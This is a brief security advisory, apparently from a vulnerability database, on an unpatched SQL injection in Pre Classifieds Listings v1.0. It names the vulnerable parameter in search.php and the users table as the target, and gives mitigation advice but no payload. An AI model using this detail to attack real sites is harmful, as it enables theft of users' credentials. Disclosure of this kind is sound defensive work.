Vendor: Pre Classifieds Listings
By: Cyber-Security.org
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: Pre Classifieds Listings
Affected Version From: Pre Classifieds Listings v1.0
Affected Version To: Pre Classifieds Listings v1.0
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: Not specified
2007
Pre Classifieds Listings v1.0 Remote SQL Injection
This vulnerability allows an attacker to perform a SQL injection attack against a website running Pre Classifieds Listings v1.0. By manipulating the 'category' parameter of the search.php page, the attacker can inject SQL code to retrieve sensitive information such as passwords or usernames from the 'users' table.
Mitigation:
To mitigate this vulnerability, implement proper input validation and use parameterized queries to prevent SQL injection attacks. Keeping the software up to date with patches and security updates is also advised.